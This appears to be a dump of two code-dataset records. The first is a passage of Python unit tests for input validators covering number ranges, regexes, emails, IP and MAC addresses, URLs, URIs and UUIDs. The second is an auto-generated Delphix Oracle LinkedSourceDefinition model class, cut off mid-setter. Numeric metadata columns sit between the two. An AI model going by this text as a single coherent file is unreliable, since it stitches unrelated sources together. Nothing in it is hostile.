self.assertEqual(result.error_messages[0].code, NumberRange.OUT_OF_RANGE)
self.assertEqual(result.error_messages[0].msg,
"'5' is out of range (None, 4)")
def test_validate_int_no_max_success(self):
validator = NumberRange(min=4)
self.assertTrue(validator.is_valid(5))
def test_validate_int_no_max_fail(self):
validator = NumberRange(min=4)
result = validator.is_valid(1)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, NumberRange.OUT_OF_RANGE)
self.assertEqual(result.error_messages[0].msg,
"'1' is out of range (4, None)")
class TestRegexp(TestCase):
def setUp(self):
self.validator = Regexp(regex="^aa.+bb$")
def tearDown(self):
pass
def test_validate_str_success(self):
self.assertTrue(self.validator.is_valid("aarrbb"))
def test_validate_str_fail(self):
self.assertFalse(self.validator.is_valid("aarrbbcc"))
result = self.validator.is_valid("aarrbbcc")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, Regexp.NOT_MATCH)
self.assertEqual(result.error_messages[0].msg,
"'aarrbbcc' does not match against pattern '^aa.+bb$'")
def test_validate_str_case_sensitive_fail(self):
result = self.validator.is_valid("Aarrbb")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, Regexp.NOT_MATCH)
self.assertEqual(result.error_messages[0].msg,
"'Aarrbb' does not match against pattern '^aa.+bb$'")
def test_validate_str_case_insensitive_success(self):
self.validator = Regexp(regex="^aa.+bb$", flags=re.IGNORECASE)
self.assertTrue(self.validator.is_valid("Aarrbb"))
def test_validate_int_fail(self):
result = self.validator.is_valid(6)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, Regexp.NOT_MATCH)
self.assertEqual(result.error_messages[0].msg,
"'6' does not match against pattern '^aa.+bb$'")
class TestEmail(TestCase):
def setUp(self):
self.validator = Email()
def tearDown(self):
pass
def test_validate_str_success(self):
self.assertTrue(self.validator.is_valid("aarrbb@aaaa.com"))
def test_validate_str_fail(self):
result = self.validator.is_valid("aarrbbaaaa@sas.c")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, Email.NOT_MAIL)
self.assertEqual(result.error_messages[0].msg,
"'aarrbbaaaa@sas.c' is not a valid email address.")
def test_validate_int_fail(self):
result = self.validator.is_valid(4)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, Email.NOT_MAIL)
self.assertEqual(result.error_messages[0].msg,
"'4' is not a valid email address.")
class TestIPAddress(TestCase):
def setUp(self):
self.validator = IPAddress()
def test_validate_str_ipv4_success(self):
self.assertTrue(self.validator.is_valid("192.168.2.2"))
def test_validate_str_ipv4_fail(self):
result = self.validator.is_valid("192.168.2.277")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, IPAddress.NOT_IP_ADDRESS)
self.assertEqual(result.error_messages[0].msg,
"'192.168.2.277' does not appear to be a valid IP address. Allowed ipv4")
def test_validate_str_ipv6_not_allowed_fail(self):
result = self.validator.is_valid("2001:0db8:85a3:08d3:1319:8a2e:0370:7334")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, IPAddress.IPV6_NOT_ALLOWED)
self.assertEqual(result.error_messages[0].msg,
"'2001:0db8:85a3:08d3:1319:8a2e:0370:7334' is "
"an ipv6 address that is not allowed. Allowed ipv4")
def test_validate_str_ipv6_success(self):
validator = IPAddress(ipv4=False, ipv6=True)
self.assertTrue(validator.is_valid("2001:0db8:85a3:08d3:1319:8a2e:0370:7334"))
def test_validate_str_ipv6_reduced_success(self):
validator = IPAddress(ipv4=False, ipv6=True)
self.assertTrue(validator.is_valid("2001:0db8:85a3::8a2e:0370:7334"))
def test_validate_str_ipv6_reduced_localhost_success(self):
validator = IPAddress(ipv4=False, ipv6=True)
self.assertTrue(validator.is_valid("::1"))
def test_validate_str_ipv6_fail(self):
validator = IPAddress(ipv4=False, ipv6=True)
result = validator.is_valid("2001:0db8:85a3:08d3:1319:8a2e:0370:733T")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, IPAddress.NOT_IP_ADDRESS)
self.assertEqual(result.error_messages[0].msg,
"'2001:0db8:85a3:08d3:1319:8a2e:0370:733T' does "
"not appear to be a valid IP address. Allowed ipv6")
def test_validate_str_ipv6_too_large_fail(self):
validator = IPAddress(ipv4=False, ipv6=True)
result = validator.is_valid("2001:0db8:85a3:08d3:1319:8a2e:0370:7333:3333:3333")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, IPAddress.NOT_IP_ADDRESS)
self.assertEqual(result.error_messages[0].msg,
"'2001:0db8:85a3:08d3:1319:8a2e:0370:7333:3333:3333' does "
"not appear to be a valid IP address. Allowed ipv6")
def test_validate_str_ipv6_too_big_fail(self):
validator = IPAddress(ipv4=False, ipv6=True)
result = validator.is_valid("2001:0db8:85a3:08d3:1319:8a2e:0370:7333FFF")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, IPAddress.NOT_IP_ADDRESS)
self.assertEqual(result.error_messages[0].msg,
"'2001:0db8:85a3:08d3:1319:8a2e:0370:7333FFF' does "
"not appear to be a valid IP address. Allowed ipv6")
def test_validate_str_ipv6_bad_white_spaces_fail(self):
validator = IPAddress(ipv4=False, ipv6=True)
result = validator.is_valid(":0db8:")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, IPAddress.NOT_IP_ADDRESS)
self.assertEqual(result.error_messages[0].msg,
"':0db8:' does "
"not appear to be a valid IP address. Allowed ipv6")
def test_validate_str_ipv4_not_allowed_fail(self):
validator = IPAddress(ipv4=False, ipv6=True)
result = validator.is_valid("192.168.2.233")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, IPAddress.IPV4_NOT_ALLOWED)
self.assertEqual(result.error_messages[0].msg,
"'192.168.2.233' is an ipv4 address that is not allowed. Allowed ipv6")
def test_validate_str_ipv4_ipv6_using_ipv4_success(self):
validator = IPAddress(ipv4=True, ipv6=True)
self.assertTrue(validator.is_valid("192.168.2.2"))
def test_validate_str_ipv4_ipv6_using_ipv6_success(self):
validator = IPAddress(ipv4=True, ipv6=True)
self.assertTrue(validator.is_valid("2001:0db8:85a3:08d3:1319:8a2e:0370:7334"))
def test_validate_str_ipv4_ipv6_using_ipv6_reduced_success(self):
validator = IPAddress(ipv4=True, ipv6=True)
self.assertTrue(validator.is_valid("2001:0db8:85a3::8a2e:0370:7334"))
def test_validate_str_ipv4_ipv6_using_wrong_ipv4_fail(self):
validator = IPAddress(ipv4=True, ipv6=True)
result = validator.is_valid("192.168.2.277")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, IPAddress.NOT_IP_ADDRESS)
self.assertEqual(result.error_messages[0].msg,
"'192.168.2.277' does not appear to be a valid IP address. Allowed ipv4 and ipv6")
def test_validate_str_ipv4_ipv6_using_wrong_ipv6_fail(self):
validator = IPAddress(ipv4=True, ipv6=True)
result = validator.is_valid("2001:0db8:85a3:08d3:1319:8a2e:0370:733T")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, IPAddress.NOT_IP_ADDRESS)
self.assertEqual(result.error_messages[0].msg,
"'2001:0db8:85a3:08d3:1319:8a2e:0370:733T' does not "
"appear to be a valid IP address. Allowed ipv4 and ipv6")
def test_validate_int_fail(self):
validator = IPAddress(ipv4=True, ipv6=True)
result = validator.is_valid(2323)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, IPAddress.NOT_IP_ADDRESS)
self.assertEqual(result.error_messages[0].msg,
"'2323' does not appear to be a valid IP address. Allowed ipv4 and ipv6")
def test_bad_definition(self):
with self.assertRaises(ValueError):
self.validator = IPAddress(ipv4=False, ipv6=False)
class TestMacAddress(TestCase):
def setUp(self):
self.validator = MacAddress()
def tearDown(self):
pass
def test_validate_str_success(self):
self.assertTrue(self.validator.is_valid("01:23:45:67:89:ab"))
def test_validate_str_fail(self):
result = self.validator.is_valid("aarrbba@sas.c")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, MacAddress.INVALID_MAC_ADDRESS)
self.assertEqual(result.error_messages[0].msg,
"'aarrbba@sas.c' is not a valid mac address.")
def test_validate_int_fail(self):
result = self.validator.is_valid(4)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, MacAddress.INVALID_MAC_ADDRESS)
self.assertEqual(result.error_messages[0].msg,
"'4' is not a valid mac address.")
class TestURL(TestCase):
def setUp(self):
self.validator = URL()
def tearDown(self):
pass
def test_validate_str_required_tld_http_success(self):
self.assertTrue(self.validator.is_valid("http://www.google.com"))
def test_validate_str_required_tld_git_success(self):
self.assertTrue(self.validator.is_valid("git://github.com"))
def test_validate_str_no_protocol_fail(self):
result = self.validator.is_valid("google.com")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, URL.INVALID_URL)
self.assertEqual(result.error_messages[0].msg,
"'google.com' is not a valid url.")
def test_validate_int_fail(self):
result = self.validator.is_valid(4)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, URL.INVALID_URL)
self.assertEqual(result.error_messages[0].msg,
"'4' is not a valid url.")
def test_validate_str_not_required_tld_http_success(self):
validator = URL(require_tld=False)
self.assertTrue(validator.is_valid("http://google"))
def test_validate_str_not_required_tld_git_success(self):
validator = URL(require_tld=False)
self.assertTrue(validator.is_valid("git://github"))
def test_validate_str_not_required_tld_s3_success(self):
validator = URL(require_tld=False)
self.assertTrue(validator.is_valid("s3://my_bucket"))
def test_validate_str_composed_scheme_plus_success(self):
self.assertTrue(self.validator.is_valid("git+ssh://github.com"))
def test_validate_str_composed_scheme_colon_success(self):
self.assertTrue(self.validator.is_valid("jdbc:postgresql://mydb.com"))
class TestURI(TestCase):
def setUp(self):
self.validator = URI()
def tearDown(self):
pass
def test_validate_str_http_success(self):
self.assertTrue(self.validator.is_valid("http://www.google.com"))
def test_validate_str_s3_success(self):
self.assertTrue(self.validator.is_valid("s3://www.google.com"))
def test_validate_str_required_tld_git_success(self):
self.assertTrue(self.validator.is_valid("git://github.com"))
def test_validate_str_no_protocol_fail(self):
result = self.validator.is_valid("google.com")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, URI.INVALID_URI)
self.assertEqual(result.error_messages[0].msg,
"'google.com' is not a valid uri.")
def test_validate_int_fail(self):
result = self.validator.is_valid(4)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, URI.INVALID_URI)
self.assertEqual(result.error_messages[0].msg,
"'4' is not a valid uri.")
def test_validate_str_not_required_tld_http_success(self):
self.validator = URL(require_tld=False)
self.assertTrue(self.validator.is_valid("http://google"))
def test_validate_str_not_required_tld_git_success(self):
self.validator = URL(require_tld=False)
self.assertTrue(self.validator.is_valid("git://github"))
def test_validate_str_composed_scheme_plus_success(self):
self.assertTrue(self.validator.is_valid("git+ssh://github.com/sdss"))
def test_validate_str_composed_scheme_colon_success(self):
self.assertTrue(self.validator.is_valid("jdbc:postgresql://mydb.com/dcdgfd"))
def test_validate_str_composed_scheme_plus_no_host_success(self):
self.assertTrue(self.validator.is_valid("hdfs+csv:///sdss"))
def test_validate_str_composed_scheme_plus_no_host_2_success(self):
self.assertTrue(self.validator.is_valid("hdfs+csv:/sdss"))
class TestUUID(TestCase):
def setUp(self):
self.validator = UUID()
def tearDown(self):
pass
def test_validate_str_success(self):
self.assertTrue(self.validator.is_valid("550e8400-e29b-41d4-a716-446655440000"))
def test_validate_str_fail(self):
result = self.validator.is_valid("aarrbbaaaa@sas.c")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, UUID.INVALID_UUID)
self.assertEqual(result.error_messages[0].msg,
"'aarrbbaaaa@sas.c' is not a valid UUID.")
def test_validate_int_fail(self):
result = self.validator.is_valid(4)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, UUID.INVALID_UUID)
self.assertEqual(result.error_messages[0].msg,
"'4' is not a valid UUID.")
class TestAnyOf(TestCase):
def setUp(self):
self.validator = AnyOf(values=[1, "2", "aaas", "ouch"])
def tearDown(self):
pass
def test_validate_str_success(self):
self.assertTrue(self.validator.is_valid("aaas"))
def test_validate_int_success(self):
self.assertTrue(self.validator.is_valid(1))
def test_validate_str_fail(self):
result = self.validator.is_valid('lass')
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, AnyOf.NOT_IN_LIST)
self.assertEqual(result.error_messages[0].msg,
"'lass' is none of 1, '2', 'aaas', 'ouch'.")
def test_validate_int_as_str_fail(self):
result = self.validator.is_valid(4)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, AnyOf.NOT_IN_LIST)
self.assertEqual(result.error_messages[0].msg,
"'4' is none of 1, '2', 'aaas', 'ouch'.")
class TestNoneOf(TestCase):
def setUp(self):
self.validator = NoneOf(values=[1, "2", "aaas", "ouch"])
def tearDown(self):
pass
def test_validate_str_success(self):
self.assertTrue(self.validator.is_valid("aaaaaas"))
def test_validate_int_success(self):
self.assertTrue(self.validator.is_valid(9))
def test_validate_int_as_str_success(self):
self.assertTrue(self.validator.is_valid(2))
def test_validate_str_fail(self):
result = self.validator.is_valid("ouch")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, NoneOf.IN_LIST)
self.assertEqual(result.error_messages[0].msg,
"'ouch' is one of 1, '2', 'aaas', 'ouch'.")
class TestEmpty(TestCase):
def setUp(self):
self.validator = IsEmpty()
def test_validate_str_empty(self):
self.assertTrue(self.validator.is_valid(""))
def test_validate_class_empty(self):
class EmptyClass:
def __len__(self):
return 0
self.assertTrue(self.validator.is_valid(EmptyClass()))
def test_validate_not_empty_class(self):
class NotEmptyClass:
def __repr__(self):
return "NotEmptyClass"
result = self.validator.is_valid(NotEmptyClass())
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, IsEmpty.EMPTY)
self.assertEqual(result.error_messages[0].msg,
"'NotEmptyClass' must be empty")
def test_validate_none_ok(self):
self.assertTrue(self.validator.is_valid(None))
def test_float_ok(self):
self.assertTrue(self.validator.is_valid(0.0))
class TestNotEmpty(TestCase):
def setUp(self):
self.validator = NotEmpty()
def test_validate_str_empty(self):
result = self.validator.is_valid('')
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, NotEmpty.NOT_EMPTY)
self.assertEqual(result.error_messages[0].msg,
"Value can not be empty")
def test_validate_class_empty(self):
class EmptyClass:
def __len__(self):
return 0
self.assertFalse(self.validator.is_valid(EmptyClass()))
def test_validate_not_empty_class(self):
class NotEmptyClass:
pass
self.assertTrue(self.validator.is_valid(NotEmptyClass()))
def test_validate_none_raises(self):
self.assertFalse(self.validator.is_valid(None))
def test_float_raises(self):
self.assertFalse(self.validator.is_valid(0.0))
class TestNotEmptyString(TestCase):
def setUp(self):
self.validator = NotEmptyString()
def test_validate_str_empty(self):
result = self.validator.is_valid('')
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, NotEmptyString.NOT_EMPTY)
self.assertEqual(result.error_messages[0].msg,
"Value can not be empty")
def test_validate_str_more_whites_empty(self):
result = self.validator.is_valid(" ")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, NotEmptyString.NOT_EMPTY)
self.assertEqual(result.error_messages[0].msg,
"Value can not be empty")
def test_validate_not_str(self):
result = self.validator.is_valid(3)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, NotEmptyString.NOT_STRING)
self.assertEqual(result.error_messages[0].msg,
"Value must be a string")
def test_validate_not_empty(self):
self.assertTrue(self.validator.is_valid("Batman"))
class TestIsNone(TestCase):
def setUp(self):
self.validator = IsNone()
def test_validate_str_empty(self):
result = self.validator.is_valid("")
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, IsNone.NONE)
self.assertEqual(result.error_messages[0].msg,
"'' must be None")
def test_validate_class_empty(self):
class EmptyClass:
def __len__(self):
return 0
self.assertFalse(self.validator.is_valid(EmptyClass()))
def test_validate_none(self):
self.assertTrue(self.validator.is_valid(None))
def test_float_raises(self):
self.assertFalse(self.validator.is_valid(0.0))
class TestIsNotNone(TestCase):
def setUp(self):
self.validator = NotNone()
def test_validate_none_raises(self):
result = self.validator.is_valid(None)
self.assertFalse(result)
self.assertEqual(len(result.error_messages), 1)
self.assertEqual(result.error_messages[0].code, NotNone.NOT_NONE)
self.assertEqual(result.error_messages[0].msg,
NotNone.error_messages[NotNone.NOT_NONE])
def test_empty_class_ok(self):
class EmptyClass:
def __len__(self):
return 0
self.assertTrue(self.validator.is_valid(EmptyClass()))
| 38.772109
| 112
| 0.663187
| 4,272
| 34,197
| 5.094101
| 0.060861
| 0.101553
| 0.137947
| 0.129032
| 0.923123
| 0.899917
| 0.847716
| 0.822259
| 0.770563
| 0.745474
| 0
| 0.031589
| 0.224259
| 34,197
| 881
| 113
| 38.816118
| 0.788752
| 0
| 0
| 0.636501
| 0
| 0.006033
| 0.107933
| 0.020002
| 0
| 0
| 0
| 0
| 0.420814
| 1
| 0.223228
| false
| 0.0181
| 0.004525
| 0.007541
| 0.27451
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
df16a1c16d19f9cb922e7aba8565542632aa63d4
| 24,231
|
py
|
Python
|
src/generated/definitions/linked_source_definition.py
|
shivam5489/test
|
7461db55bcf44ecf70a30812620ed012ffecf80a
|
[
"Apache-2.0"
] | null | null | null |
src/generated/definitions/linked_source_definition.py
|
shivam5489/test
|
7461db55bcf44ecf70a30812620ed012ffecf80a
|
[
"Apache-2.0"
] | null | null | null |
src/generated/definitions/linked_source_definition.py
|
shivam5489/test
|
7461db55bcf44ecf70a30812620ed012ffecf80a
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2019 by Delphix. All rights reserved.
#
from __future__ import absolute_import
from datetime import date, datetime
from generated.definitions.base_model_ import (
Model, GeneratedClassesError, GeneratedClassesTypeError)
from generated.definitions.virtual_source_definition_custom_init_params import VirtualSourceDefinitionCustomInitParams
import re
from generated import util
class LinkedSourceDefinition(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, username='', mount_path='', dbid='', custom_init_params_file='', custom_init_params=None, rman_channels=None, dbctrlbkppiece='', password='', instance_name='', dbrmanbkploc='', validate=True):
"""LinkedSourceDefinition - a model defined in Swagger. The type of some of these
attributes can be defined as a List[ERRORUNKNOWN]. This just means they
are a list of any type.
:param username: The username of this LinkedSourceDefinition.
:type username: str
:param mount_path: The mount_path of this LinkedSourceDefinition.
:type mount_path: str
:param dbid: The dbid of this LinkedSourceDefinition.
:type dbid: str
:param custom_init_params_file: The custom_init_params_file of this LinkedSourceDefinition.
:type custom_init_params_file: str
:param custom_init_params: The custom_init_params of this LinkedSourceDefinition.
:type custom_init_params: List[VirtualSourceDefinitionCustomInitParams]
:param rman_channels: The rman_channels of this LinkedSourceDefinition.
:type rman_channels: int
:param dbctrlbkppiece: The dbctrlbkppiece of this LinkedSourceDefinition.
:type dbctrlbkppiece: str
:param password: The password of this LinkedSourceDefinition.
:type password: str
:param instance_name: The instance_name of this LinkedSourceDefinition.
:type instance_name: str
:param dbrmanbkploc: The dbrmanbkploc of this LinkedSourceDefinition.
:type dbrmanbkploc: str
:param validate: If the validation should be done during init. This
should only be called internally when calling from_dict.
:type validate: bool
"""
self.swagger_types = {
'username': str,
'mount_path': str,
'dbid': str,
'custom_init_params_file': str,
'custom_init_params': util.convert_type('List[VirtualSourceDefinitionCustomInitParams]'),
'rman_channels': int,
'dbctrlbkppiece': str,
'password': str,
'instance_name': str,
'dbrmanbkploc': str
}
self.attribute_map = {
'username': 'username',
'mount_path': 'mountPath',
'dbid': 'dbid',
'custom_init_params_file': 'customInitParamsFile',
'custom_init_params': 'customInitParams',
'rman_channels': 'rmanChannels',
'dbctrlbkppiece': 'dbctrlbkppiece',
'password': 'password',
'instance_name': 'instanceName',
'dbrmanbkploc': 'dbrmanbkploc'
}
# Validating the attribute username and then saving it.
if validate and username is None:
raise GeneratedClassesError(
"The required parameter 'username' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'username',
username,
str,
True)
if validate and type_error:
raise type_error
self._username = username
# Validating the attribute mount_path and then saving it.
if validate and mount_path is None:
raise GeneratedClassesError(
"The required parameter 'mount_path' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'mount_path',
mount_path,
str,
True)
if validate and type_error:
raise type_error
self._mount_path = mount_path
# Validating the attribute dbid and then saving it.
if validate and dbid is None:
raise GeneratedClassesError(
"The required parameter 'dbid' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'dbid',
dbid,
str,
True)
if validate and type_error:
raise type_error
if (dbid is not None
and not re.search('^$|^[0-9]*$', dbid)):
raise GeneratedClassesError(
"Invalid value for 'dbid', was '{}' but must follow the"
" pattern '^$|^[0-9]*$'.".format(dbid))
self._dbid = dbid
# Validating the attribute custom_init_params_file and then saving it.
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'custom_init_params_file',
custom_init_params_file,
str,
False)
if validate and type_error:
raise type_error
self._custom_init_params_file = custom_init_params_file
# Validating the attribute custom_init_params and then saving it.
expected_type = util.convert_type('List[VirtualSourceDefinitionCustomInitParams]')
element_type = util.get_contained_type('List[VirtualSourceDefinitionCustomInitParams]')
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'custom_init_params',
custom_init_params,
expected_type,
False,
element_type)
if validate and type_error:
raise type_error
self._custom_init_params = custom_init_params
# Validating the attribute rman_channels and then saving it.
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'rman_channels',
rman_channels,
int,
False)
if validate and type_error:
raise type_error
self._rman_channels = rman_channels
# Validating the attribute dbctrlbkppiece and then saving it.
if validate and dbctrlbkppiece is None:
raise GeneratedClassesError(
"The required parameter 'dbctrlbkppiece' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'dbctrlbkppiece',
dbctrlbkppiece,
str,
True)
if validate and type_error:
raise type_error
if (dbctrlbkppiece is not None
and not re.search('^$|^[^\\s]*$', dbctrlbkppiece)):
raise GeneratedClassesError(
"Invalid value for 'dbctrlbkppiece', was '{}' but must follow the"
" pattern '^$|^[^\\s]*$'.".format(dbctrlbkppiece))
self._dbctrlbkppiece = dbctrlbkppiece
# Validating the attribute password and then saving it.
if validate and password is None:
raise GeneratedClassesError(
"The required parameter 'password' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'password',
password,
str,
True)
if validate and type_error:
raise type_error
self._password = password
# Validating the attribute instance_name and then saving it.
if validate and instance_name is None:
raise GeneratedClassesError(
"The required parameter 'instance_name' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'instance_name',
instance_name,
str,
True)
if validate and type_error:
raise type_error
self._instance_name = instance_name
# Validating the attribute dbrmanbkploc and then saving it.
if validate and dbrmanbkploc is None:
raise GeneratedClassesError(
"The required parameter 'dbrmanbkploc' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'dbrmanbkploc',
dbrmanbkploc,
str,
True)
if validate and type_error:
raise type_error
if (dbrmanbkploc is not None
and not re.search('^$|^[^\\s]*$', dbrmanbkploc)):
raise GeneratedClassesError(
"Invalid value for 'dbrmanbkploc', was '{}' but must follow the"
" pattern '^$|^[^\\s]*$'.".format(dbrmanbkploc))
self._dbrmanbkploc = dbrmanbkploc
@classmethod
def from_dict(cls, dikt):
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The linkedSourceDefinition of this LinkedSourceDefinition.
:rtype: LinkedSourceDefinition
"""
return util.deserialize_model(dikt, cls)
@property
def username(self):
"""Gets the username of this LinkedSourceDefinition.
Oracle User Name
:return: The username of this LinkedSourceDefinition.
:rtype: str
"""
return self._username
@username.setter
def username(self, username):
"""Sets the username of this LinkedSourceDefinition.
Oracle User Name
:param username: The username of this LinkedSourceDefinition.
:type username: str
"""
# Validating the attribute username and then saving it.
if username is None:
raise GeneratedClassesError(
"The required parameter 'username' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'username',
username,
str,
True)
if type_error:
raise type_error
self._username = username
@property
def mount_path(self):
"""Gets the mount_path of this LinkedSourceDefinition.
Where to mount storage onto the staging host while syncing
:return: The mount_path of this LinkedSourceDefinition.
:rtype: str
"""
return self._mount_path
@mount_path.setter
def mount_path(self, mount_path):
"""Sets the mount_path of this LinkedSourceDefinition.
Where to mount storage onto the staging host while syncing
:param mount_path: The mount_path of this LinkedSourceDefinition.
:type mount_path: str
"""
# Validating the attribute mount_path and then saving it.
if mount_path is None:
raise GeneratedClassesError(
"The required parameter 'mount_path' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'mount_path',
mount_path,
str,
True)
if type_error:
raise type_error
self._mount_path = mount_path
@property
def dbid(self):
"""Gets the dbid of this LinkedSourceDefinition.
:return: The dbid of this LinkedSourceDefinition.
:rtype: str
"""
return self._dbid
@dbid.setter
def dbid(self, dbid):
"""Sets the dbid of this LinkedSourceDefinition.
:param dbid: The dbid of this LinkedSourceDefinition.
:type dbid: str
"""
# Validating the attribute dbid and then saving it.
if dbid is None:
raise GeneratedClassesError(
"The required parameter 'dbid' must not be 'None'.")
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'dbid',
dbid,
str,
True)
if type_error:
raise type_error
if (dbid is not None
and not re.search('^$|^[0-9]*$', dbid)):
raise GeneratedClassesError(
"Invalid value for 'dbid', was '{}' but must follow the"
" pattern '^$|^[0-9]*$'.".format(dbid))
self._dbid = dbid
@property
def custom_init_params_file(self):
"""Gets the custom_init_params_file of this LinkedSourceDefinition.
Each line in file, parameter=value
:return: The custom_init_params_file of this LinkedSourceDefinition.
:rtype: str
"""
return self._custom_init_params_file
@custom_init_params_file.setter
def custom_init_params_file(self, custom_init_params_file):
"""Sets the custom_init_params_file of this LinkedSourceDefinition.
Each line in file, parameter=value
:param custom_init_params_file: The custom_init_params_file of this LinkedSourceDefinition.
:type custom_init_params_file: str
"""
# Validating the attribute custom_init_params_file and then saving it.
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'custom_init_params_file',
custom_init_params_file,
str,
False)
if type_error:
raise type_error
self._custom_init_params_file = custom_init_params_file
@property
def custom_init_params(self):
"""Gets the custom_init_params of this LinkedSourceDefinition.
:return: The custom_init_params of this LinkedSourceDefinition.
:rtype: List[VirtualSourceDefinitionCustomInitParams]
"""
return self._custom_init_params
@custom_init_params.setter
def custom_init_params(self, custom_init_params):
"""Sets the custom_init_params of this LinkedSourceDefinition.
:param custom_init_params: The custom_init_params of this LinkedSourceDefinition.
:type custom_init_params: List[VirtualSourceDefinitionCustomInitParams]
"""
# Validating the attribute custom_init_params and then saving it.
expected_type = util.convert_type('List[VirtualSourceDefinitionCustomInitParams]')
element_type = util.get_contained_type('List[VirtualSourceDefinitionCustomInitParams]')
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'custom_init_params',
custom_init_params,
expected_type,
False,
element_type)
if type_error:
raise type_error
self._custom_init_params = custom_init_params
@property
def rman_channels(self):
"""Gets the rman_channels of this LinkedSourceDefinition.
RMAN channels for restore
:return: The rman_channels of this LinkedSourceDefinition.
:rtype: int
"""
return self._rman_channels
@rman_channels.setter
def rman_channels(self, rman_channels):
"""Sets the rman_channels of this LinkedSourceDefinition.
RMAN channels for restore
:param rman_channels: The rman_channels of this LinkedSourceDefinition.
:type rman_channels: int
"""
# Validating the attribute rman_channels and then saving it.
type_error = GeneratedClassesTypeError.type_error(LinkedSourceDefinition,
'rman_channels',
rman_channels,
int,
False)
if type_error:
raise type_error
self._rman_channels = rman_channels
@property
def dbctrlbkppiece(self):
"""Gets the dbctrlbkppiece of this LinkedSourceDefinition.
:return: The dbctrlbkppiece of this LinkedSourceDefinition.
:rtype: str
"""
return self._dbctrlbkppiece
@dbctrlbkppiece.setter
def dbctrlbkppiece(self, dbctrlbkppiece):
"""Sets the dbctrlbkppiece of this LinkedSourceDefinition.
:param dbctrlbkppiece: The dbctrlbkppiece of this LinkedSourceDefinition.
:type dbctrlbkppiece: str
"""
# Validating the attribute dbctrlbkppiece and then saving it.
if dbctrlbkppiece is None:
raise GeneratedClassesError(
"The required parameter 'dbctrlbkppiece' must not be 'None'.")
